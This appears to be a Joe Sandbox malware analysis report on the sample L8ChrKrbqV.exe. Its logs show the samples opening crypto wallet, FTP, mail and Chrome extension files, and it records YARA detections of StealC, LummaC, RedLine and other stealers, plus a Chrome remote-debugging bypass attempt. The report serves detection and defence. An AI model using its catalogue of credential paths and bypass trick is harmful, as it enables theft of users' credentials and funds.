Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU

Source: Yara match	File source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2487463135.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1396974908.000000000114D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1369543614.000000000118F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1386517009.0000000001134000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: L8ChrKrbqV.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cab7dbccac.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ab13ed0cb0.exe PID: 7852, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: d40ec5ca11.exe PID: 2916, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: L8ChrKrbqV.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cab7dbccac.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ab13ed0cb0.exe PID: 7852, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.1882078107.0000000000491000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1483989893.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD0C40 sqlite3_bind_zeroblob,	9_2_6CCD0C40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD0D60 sqlite3_bind_parameter_name,	9_2_6CCD0D60
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF8EA0 sqlite3_clear_bindings,	9_2_6CBF8EA0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	9_2_6CCD0B40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF6410 bind,WSAGetLastError,	9_2_6CBF6410
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF60B0 listen,WSAGetLastError,	9_2_6CBF60B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBFC030 sqlite3_bind_parameter_count,	9_2_6CBFC030
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF6070 PR_Listen,	9_2_6CBF6070
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBFC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	9_2_6CBFC050
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB822D0 sqlite3_bind_blob,	9_2_6CB822D0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF63C0 PR_Bind,	9_2_6CBF63C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF9480 sqlite3_bind_null,	9_2_6CBF9480
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF94F0 sqlite3_bind_text16,	9_2_6CBF94F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF94C0 sqlite3_bind_text,	9_2_6CBF94C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF9400 sqlite3_bind_int64,	9_2_6CBF9400

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	4 Obfuscated Files or Information	Security Account Manager	248 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	11 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1071 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	461 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	461 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report L8ChrKrbqV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: Cryptbot

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
L8ChrKrbqV.exe